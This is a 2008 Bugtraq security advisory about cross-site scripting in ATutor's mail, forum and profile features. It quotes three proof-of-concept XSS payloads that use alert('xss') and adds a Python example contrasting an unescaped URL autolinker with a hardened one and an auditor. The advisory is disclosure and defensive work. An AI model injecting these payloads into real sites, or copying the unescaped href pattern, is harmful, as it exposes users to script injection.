ATutor <= 1.5.5 Cross Site Scripting
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: ATutor <= 1.5.5 Cross Site Scripting
- From: L4teral <l4teral@xxxxxxxxx>
- Date: Mon, 18 Feb 2008 00:01:07 +0100
======================================================================
ATutor <= 1.5.5 Cross Site Scripting
======================================================================
Author: L4teral <l4teral [4t] gmail com>
Impact: Cross Site Scripting
Status: patch available
------------------------------
Affected software description:
------------------------------
Application: ATutor
Version: <= 1.5.5
Vendor: http://www.atutor.ca
Description:
ATutor is an Open Source Web-based Learning Content Management System
(LCMS) designed with accessibility and adaptability in mind.
Administrators can install or update ATutor in minutes, develop custom
templates to give ATutor a new look, and easily extend its
functionality with feature modules. Educators can quickly assemble,
package, and redistribute Web-based instructional content, easily
retrieve and import prepackaged content, and conduct their courses
online. Students learn in an adaptive learning environment.
--------------
Vulnerability:
--------------
The mail and forum components are vulnerable to cross site scripting.
Script code can be embedded into the user profile.
------------
PoC/Exploit:
------------
Create a forum post/mail with:
http://www.ex"style="width:expression(alert('xss'))"ample.com (IE only)
Create a forum post/mail with:
http://www.ex"onmouseover="javascript:alert('xss');"ample.com
Use the following as the website in the profile:
http://"></a><script>alert('xss')</script>
---------
Solution:
---------
Update to version 1.6 or above.
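
The following is an added example, not part of the original advisory and not ATutor source code. It assumes the vulnerable pattern is a URL auto-linker that pastes the matched URL into an href attribute without encoding (`autolink_naive`, a hypothetical name), and shows a hardened linker next to it; `audit` parses the resulting markup and reports any tag or attribute other than a plain `<a href>`, using the three PoC strings above as input.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# The three PoC strings quoted in the advisory, used here as test input.
POC = [
    "http://www.ex\"style=\"width:expression(alert('xss'))\"ample.com",
    "http://www.ex\"onmouseover=\"javascript:alert('xss');\"ample.com",
    "http://\"></a><script>alert('xss')</script>",
]
URL_RE = re.compile(r"https?://\S+")
HOST_RE = re.compile(r"[A-Za-z0-9.-]+(:\d+)?")

def autolink_naive(text):
    # Assumed vulnerable pattern (not ATutor source): URL pasted into href as-is.
    return URL_RE.sub(lambda m: '<a href="{0}">{0}</a>'.format(m.group(0)), text)

def safe_link(url):
    # HTML-encode first; only emit a link when scheme and host validate.
    enc = html.escape(url, quote=True)
    try:
        parts = urlsplit(url)
    except ValueError:
        return enc
    if parts.scheme not in ("http", "https") or not HOST_RE.fullmatch(parts.netloc):
        return enc  # rendered as inert text, no anchor element
    return '<a href="{0}">{0}</a>'.format(enc)

def autolink_safe(text):
    out, pos = [], 0
    for m in URL_RE.finditer(text):
        out += [html.escape(text[pos:m.start()], quote=True), safe_link(m.group(0))]
        pos = m.end()
    return "".join(out) + html.escape(text[pos:], quote=True)

class _Audit(HTMLParser):
    # Records every tag other than <a> and every attribute other than href.
    def handle_starttag(self, tag, attrs):
        extra = ["attr:" + name for name, _ in attrs if name != "href"]
        self.findings += ([] if tag == "a" else ["tag:" + tag]) + extra

def audit(markup):
    parser = _Audit()
    parser.findings = []
    parser.feed(markup)
    return parser.findings

if __name__ == "__main__":
    print([(audit(autolink_naive(s)), audit(autolink_safe(s))) for s in POC])
```

The same `audit` check can be run over rendered forum, mail and profile output in a regression test to confirm that user-supplied URLs never introduce extra attributes or elements.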
---------
Timeline:
---------
2007-10-17 - vendor informed
2007-10-18 - vendor responded
2008-02-05 - vendor released new version
2008-02-17 - public disclosure